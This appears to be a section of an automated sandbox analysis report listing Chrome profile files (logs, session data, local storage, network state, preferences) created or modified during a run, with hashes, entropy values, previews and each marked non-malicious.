                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):38
                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:FQxlXNQxlX:qTCT
                                                                                                                                                                                                                        MD5:51A2CBB807F5085530DEC18E45CB8569
                                                                                                                                                                                                                        SHA1:7AD88CD3DE5844C7FC269C4500228A630016AB5B
                                                                                                                                                                                                                        SHA-256:1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
                                                                                                                                                                                                                        SHA-512:B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: .f.5................f.5...............
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):372
                                                                                                                                                                                                                        Entropy (8bit):5.278790223863936
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxyL+q2PWXp+N23iKKdK25+Xqx8chI+IFUtAPdxQl1Zmw2PdxdLVkwOWXp+Nl:uPnva5KkTXfchI3FUtAPo1/2Pr5f5KkI
                                                                                                                                                                                                                        MD5:B54B937C50BAA3C3F0D6FECA257DF8FA
                                                                                                                                                                                                                        SHA1:E71DFF032FCB61F0D7AC53AA990E6C7E8DEC81F3
                                                                                                                                                                                                                        SHA-256:6F6A8965BB4C86585876A9B71A222DCBCB03F17A22679E1BF86B4188D7CDB5F3
                                                                                                                                                                                                                        SHA-512:CE7FE08D9B224F01B49D66D4AC68A48D36846E888BD4CC985C0E05EC7DAC0C2B7015FD03D3E57E3FB59C09B50C02420F2012D0A8707DC9065F6E994EC15B54B1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.044 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/12/06-19:08:55.048 15e8 Recovering log #3.2021/12/06-19:08:55.049 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):372
                                                                                                                                                                                                                        Entropy (8bit):5.278790223863936
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxyL+q2PWXp+N23iKKdK25+Xqx8chI+IFUtAPdxQl1Zmw2PdxdLVkwOWXp+Nl:uPnva5KkTXfchI3FUtAPo1/2Pr5f5KkI
                                                                                                                                                                                                                        MD5:B54B937C50BAA3C3F0D6FECA257DF8FA
                                                                                                                                                                                                                        SHA1:E71DFF032FCB61F0D7AC53AA990E6C7E8DEC81F3
                                                                                                                                                                                                                        SHA-256:6F6A8965BB4C86585876A9B71A222DCBCB03F17A22679E1BF86B4188D7CDB5F3
                                                                                                                                                                                                                        SHA-512:CE7FE08D9B224F01B49D66D4AC68A48D36846E888BD4CC985C0E05EC7DAC0C2B7015FD03D3E57E3FB59C09B50C02420F2012D0A8707DC9065F6E994EC15B54B1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.044 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2021/12/06-19:08:55.048 15e8 Recovering log #3.2021/12/06-19:08:55.049 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):358
                                                                                                                                                                                                                        Entropy (8bit):5.220639360686124
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxpL+q2PWXp+N23iKKdK25+XuoIFUtAPdxKz1Zmw2PdxKlLVkwOWXp+N23iKX:uP8va5KkTXYFUtAP6z1/2P6z5f5KkTXp
                                                                                                                                                                                                                        MD5:44177B55DC0D6CBC393B34182178F7E0
                                                                                                                                                                                                                        SHA1:81B4FF83B6186B08A69065F4B2FA5A414F153D9D
                                                                                                                                                                                                                        SHA-256:FCC95C7E77CA63E0A1AAFAD62A1BA1BB2A6A41E723DD2B8829F00ACAC68EFC44
                                                                                                                                                                                                                        SHA-512:0A3CB344D2E3A93FD58522700F6164DF6337FFF4F38E80BE7B8245564FADAF100BBD5EC9C72E45276B4FF0D2ED17CA92D9C839B88A88B90BD3C2ED1FC9339E7C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.038 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/12/06-19:08:55.040 15e8 Recovering log #3.2021/12/06-19:08:55.040 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):358
                                                                                                                                                                                                                        Entropy (8bit):5.220639360686124
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxpL+q2PWXp+N23iKKdK25+XuoIFUtAPdxKz1Zmw2PdxKlLVkwOWXp+N23iKX:uP8va5KkTXYFUtAP6z1/2P6z5f5KkTXp
                                                                                                                                                                                                                        MD5:44177B55DC0D6CBC393B34182178F7E0
                                                                                                                                                                                                                        SHA1:81B4FF83B6186B08A69065F4B2FA5A414F153D9D
                                                                                                                                                                                                                        SHA-256:FCC95C7E77CA63E0A1AAFAD62A1BA1BB2A6A41E723DD2B8829F00ACAC68EFC44
                                                                                                                                                                                                                        SHA-512:0A3CB344D2E3A93FD58522700F6164DF6337FFF4F38E80BE7B8245564FADAF100BBD5EC9C72E45276B4FF0D2ED17CA92D9C839B88A88B90BD3C2ED1FC9339E7C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:55.038 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/MANIFEST-000001.2021/12/06-19:08:55.040 15e8 Recovering log #3.2021/12/06-19:08:55.040 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):330
                                                                                                                                                                                                                        Entropy (8bit):5.2967585925983025
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdXL+q2PWXp+N23iKKdKWT5g1IdqIFUtAPd1fi1Zmw2Pd1f0LVkwOWXp+N23im:uPMva5Kkg5gSRFUtAPji1/2Pj05f5Kkn
                                                                                                                                                                                                                        MD5:02005E285515C0489DFB5E16253B9ED7
                                                                                                                                                                                                                        SHA1:57B590BF333228C7DE5029B5417D6DE5D7FB511A
                                                                                                                                                                                                                        SHA-256:31DD442C175B410A2A55058D66DB1E91A4D4500B3A523EAFC4B7C02E81309771
                                                                                                                                                                                                                        SHA-512:07A52F7E522558F13B6BA25781981AC7DC47EF5906179CABA9C19B686FC86BDC081C2EC8645D98F2766EE8C9319876C4F9A67038BF026DB08B429FC83FF1A83E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:54.963 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/12/06-19:08:54.964 15e8 Recovering log #3.2021/12/06-19:08:54.964 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):330
                                                                                                                                                                                                                        Entropy (8bit):5.2967585925983025
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdXL+q2PWXp+N23iKKdKWT5g1IdqIFUtAPd1fi1Zmw2Pd1f0LVkwOWXp+N23im:uPMva5Kkg5gSRFUtAPji1/2Pj05f5Kkn
                                                                                                                                                                                                                        MD5:02005E285515C0489DFB5E16253B9ED7
                                                                                                                                                                                                                        SHA1:57B590BF333228C7DE5029B5417D6DE5D7FB511A
                                                                                                                                                                                                                        SHA-256:31DD442C175B410A2A55058D66DB1E91A4D4500B3A523EAFC4B7C02E81309771
                                                                                                                                                                                                                        SHA-512:07A52F7E522558F13B6BA25781981AC7DC47EF5906179CABA9C19B686FC86BDC081C2EC8645D98F2766EE8C9319876C4F9A67038BF026DB08B429FC83FF1A83E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:54.963 15e8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2021/12/06-19:08:54.964 15e8 Recovering log #3.2021/12/06-19:08:54.964 15e8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8720
                                                                                                                                                                                                                        Entropy (8bit):0.32682373748494775
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:BlS4/fMt76Y4QZVRtRex99pG/QaqR4EZY4QZv8fOv:TS4nMWQA9LbhBQZ8fOv
                                                                                                                                                                                                                        MD5:535B426ACCF53CB052ECF8299EFBF532
                                                                                                                                                                                                                        SHA1:1E0D5E9BE4203855D9CABB83D8E483D5FAA3E0D6
                                                                                                                                                                                                                        SHA-256:B7731E8176FB064B63ED8F40B9CD454AA843AE7E3563F008C2806D4E5A607CC2
                                                                                                                                                                                                                        SHA-512:E5A7B23D89328F5AFE6B9341FD9B4EB84AC0B5ED18194C33044B1CCDDCD8B9370E5D723B2DCF5EEA7B8D00E037E936D130984DE3FE5A66AED77A86C144ACFE92
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: ............o..<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Session (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5482
                                                                                                                                                                                                                        Entropy (8bit):2.9703518002147495
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:34p6xx//9917LoubIykxQumzoP7o9LU8hIGiV5hSPFkqfdXg9On2DPwiV59/O:34mxqyIrm8Do9Ri9wdqwipO
                                                                                                                                                                                                                        MD5:9FD08E874DEA6845F3D76244735F86C9
                                                                                                                                                                                                                        SHA1:68B6AC5F1767E134DF4014BA8C2547506E4D25C2
                                                                                                                                                                                                                        SHA-256:2A83D7C2575EEDC064774B60DF94DC5C42236EA2F21E5FC2056F31C620CA0D59
                                                                                                                                                                                                                        SHA-512:13C7A27DE7A045147FDDA599EFD17608B188D3AEB2B15F12048829F89092FC82812457A02881F69F1B8F4B0E302F7CDBB1C0421A341FC0F84B9DD02A71E0C314
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: SNSS....................................................!.............................................1..,.......$...1293eea3_790b_46cf_8155_cb4a6f58db13......................r.......................................................................................................................................................................chrome://newtab/....N.e.w. .T.a.b...................................................h.......`.......................................................[.F.....\.F.............................................X...(...c.h.r.o.m.e.-.s.e.a.r.c.h.:././.l.o.c.a.l.-.n.t.p./.l.o.c.a.l.-.n.t.p...h.t.m.l.................................8.......0.......8....................................................................... ............................... ...............................h.......`.......................................................].F.....^.F.....................................................a.b.o.u.t.:.b.l.a.n.k...................H... ...<.!.-
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Tabsta (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):8
                                                                                                                                                                                                                        Entropy (8bit):1.8112781244591325
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:3Dtn:3h
                                                                                                                                                                                                                        MD5:0686D6159557E1162D04C44240103333
                                                                                                                                                                                                                        SHA1:053E9DB58E20A67D1E158E407094359BF61D0639
                                                                                                                                                                                                                        SHA-256:3303D5EED881951B0BB52CF1C6BFA758770034D0120C197F9F7A3520B92A86FB
                                                                                                                                                                                                                        SHA-512:884C0D3594390E2FC0AEAB05460F0783815170C4B57DB749B8AD9CD10741A5604B7A0F979465C4171AD9C14ED56359A4508B4DE58E794550599AAA261120976C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: SNSS....
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):7826
                                                                                                                                                                                                                        Entropy (8bit):5.389019395935603
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:oIXgdczDpE5fgnwKHgQAy1gdrrVxZE5fgHv:bsowsyHhv
                                                                                                                                                                                                                        MD5:991CD280C841363E0454E68B730C6913
                                                                                                                                                                                                                        SHA1:94BF6D6872A0EAC64F16B4F47C15E774BFCB0E65
                                                                                                                                                                                                                        SHA-256:7399C0FED9F726F61A59C68C730D02BB117A3D30EBF6C3240B2BD785049ADA41
                                                                                                                                                                                                                        SHA-512:8CC0F64F1C82A0DF859C5C94B49363EAB19383C9784044F7CF39667EDFADE846175915FAD72D97667428C0F853215792EDF095653F7755F06A4D81CEC66BDB4C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: ...5.................VERSION.1.8META:chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..............Q_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.CloudProvider7.{"cloudEnabled":false,"notifiedHangoutsPrivacy":false}.S_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.persistent.IdentityService6.{"signedIn":false,"userEmail":null,"kioskAuth":false}.Y_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.HangoutSinkDiscoveryService;.{"cache":{"sinks":{},"g":{},"h":null},"manualHangouts":{}}.a_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.IdGenerator.cast.RequestIdGenerator..826992000.H_chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm..mr.temp.LogManager...["[2020-09-30 07:58:17.19][INFO][mr.Init] MR instance ID: eed8a5c4-c410-41ec-8296-fe0906655421\n","[2020-09-30 07:58:17.20][INFO][mr.Init] Native Cast MRP is disabled.\n","[2020-09-30 07:58:17.20][INFO][mr.Init] Native Mirroring Service is enabled.\n","[2020-09-30 07:58:17.21][INFO
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                        Entropy (8bit):5.222232710788838
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdTROq2PWXp+N23iKKdK8a2jMGIFUtAPdInFZZmw2PdKMkwOWXp+N23iKKdK8N:uPxROva5Kk8EFUtAP+nX/2PsM5f5Kk8N
                                                                                                                                                                                                                        MD5:483830EFC5BF35842A6F6052E8EAAA67
                                                                                                                                                                                                                        SHA1:A08D19EA43F4B49C7ED9D4B2B414EE55CBB6B826
                                                                                                                                                                                                                        SHA-256:E22065F1D38FA56FB80B95550A819619350FD77305D85FF29DB080B68F73A91A
                                                                                                                                                                                                                        SHA-512:5DAE785B03E62A8728AB79A1A37FF12C46C50369FE886162A179DEDD8550ADF20065C7EE784CDCFA99A94F750C7A4C17D085422578F19798E6DE6100D79E3848
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:49.439 1a94 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:08:49.447 1a94 Recovering log #3.2021/12/06-19:08:49.453 1a94 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                        Entropy (8bit):5.222232710788838
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdTROq2PWXp+N23iKKdK8a2jMGIFUtAPdInFZZmw2PdKMkwOWXp+N23iKKdK8N:uPxROva5Kk8EFUtAP+nX/2PsM5f5Kk8N
                                                                                                                                                                                                                        MD5:483830EFC5BF35842A6F6052E8EAAA67
                                                                                                                                                                                                                        SHA1:A08D19EA43F4B49C7ED9D4B2B414EE55CBB6B826
                                                                                                                                                                                                                        SHA-256:E22065F1D38FA56FB80B95550A819619350FD77305D85FF29DB080B68F73A91A
                                                                                                                                                                                                                        SHA-512:5DAE785B03E62A8728AB79A1A37FF12C46C50369FE886162A179DEDD8550ADF20065C7EE784CDCFA99A94F750C7A4C17D085422578F19798E6DE6100D79E3848
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:49.439 1a94 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:08:49.447 1a94 Recovering log #3.2021/12/06-19:08:49.453 1a94 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2083
                                                                                                                                                                                                                        Entropy (8bit):4.900523861620045
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:Y2TtwCXGDH3qz5sL9KGs0RLsUSsBvrqXsEMH7snMHjDYhbD:JTOCXGDHazi9K2LjrGGeGwhH
                                                                                                                                                                                                                        MD5:71C6DA154986CFFE2027ACFF96928DA5
                                                                                                                                                                                                                        SHA1:F2CB74BCA5322D39CE745289F58D90D5D008BD4E
                                                                                                                                                                                                                        SHA-256:19F4F3040934E9EA944D006288ED046973A414B754D270479BBB12FB0B0BD831
                                                                                                                                                                                                                        SHA-512:6DDBBC8EC02DCF16EA8E37A0E40FE5A6A2103153BA1123ED96ABB01BF59C6FFBDE4BF0BFD54095E33B710DCA47557BC2ADB27C8EE475C0BA155B22CC33A8B7C9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13285912131531273","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com"},{"alternative_service":[{"advertised_versions":[50],"expiration":"13285912131555730","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://accounts.google.com","supports_spdy":true},{
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State43 (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4219
                                                                                                                                                                                                                        Entropy (8bit):4.871684703914691
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
                                                                                                                                                                                                                        MD5:EDC4A4E22003A711AEF67FAED28DB603
                                                                                                                                                                                                                        SHA1:977E551B9ED5F60D018C030B0B4AA2E33B954556
                                                                                                                                                                                                                        SHA-256:DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
                                                                                                                                                                                                                        SHA-512:84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):334
                                                                                                                                                                                                                        Entropy (8bit):5.211503111505885
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxZq2PWXp+N23iKKdKgXz4rRIFUtAPddZmw2PdIhkwOWXp+N23iKKdKgXz4qG:uPhva5KkgXiuFUtAP//2Py5f5KkgX2J
                                                                                                                                                                                                                        MD5:F6A5BCC002586274C58FFA304DD79C28
                                                                                                                                                                                                                        SHA1:6705BCE9473F7BFA95B58A5F494D78AFEDC303D9
                                                                                                                                                                                                                        SHA-256:0557A28A7FE5FA355ABDFB266AB4CFA923052BACAF98BCB9164EBBC2AE60EF66
                                                                                                                                                                                                                        SHA-512:D9779327AFFDEA42D3F008BEEABAEB896B31FB57FA2C7305F383C07F72097F46E3DFF8489CBE06ED476D79F6C5DBB02C0D911AE41666F7F436965C5843F3B61A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:50.101 1304 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/MANIFEST-000001.2021/12/06-19:08:50.113 1304 Recovering log #3.2021/12/06-19:08:50.118 1304 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):334
                                                                                                                                                                                                                        Entropy (8bit):5.211503111505885
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdxZq2PWXp+N23iKKdKgXz4rRIFUtAPddZmw2PdIhkwOWXp+N23iKKdKgXz4qG:uPhva5KkgXiuFUtAP//2Py5f5KkgX2J
                                                                                                                                                                                                                        MD5:F6A5BCC002586274C58FFA304DD79C28
                                                                                                                                                                                                                        SHA1:6705BCE9473F7BFA95B58A5F494D78AFEDC303D9
                                                                                                                                                                                                                        SHA-256:0557A28A7FE5FA355ABDFB266AB4CFA923052BACAF98BCB9164EBBC2AE60EF66
                                                                                                                                                                                                                        SHA-512:D9779327AFFDEA42D3F008BEEABAEB896B31FB57FA2C7305F383C07F72097F46E3DFF8489CBE06ED476D79F6C5DBB02C0D911AE41666F7F436965C5843F3B61A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:50.101 1304 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/MANIFEST-000001.2021/12/06-19:08:50.113 1304 Recovering log #3.2021/12/06-19:08:50.118 1304 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4844
                                                                                                                                                                                                                        Entropy (8bit):4.9581664102636305
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YciUkPkTiHj5c39EqAOqqTlYqlQKHoTw0amH3CH3G/s8C1Nfct/9BhUJo3KhmeSz:n6A39pt9pcKI5ok0JCKL8VbOTQVuwn
                                                                                                                                                                                                                        MD5:BD94BBEA2439066F1FD0EB66BE4E90A9
                                                                                                                                                                                                                        SHA1:B7096CEBADC6D72C12556E4C0C5E1563AF45740C
                                                                                                                                                                                                                        SHA-256:F44C94FA5D239A85AA654E870BB3787B5C7D66342F17F05BBD53F6703407E53C
                                                                                                                                                                                                                        SHA-512:DB14EC4D83275FCAFB0CC5160C1CBFD618A37D01BC43F5CD8FC9B7ACEA5153954B61B91C7547F158BC82790AB2C5A913D1018F7396BDA0AFED23DFE73F5ACC8D
                                                                                                                                                                                                                        Malicious:false
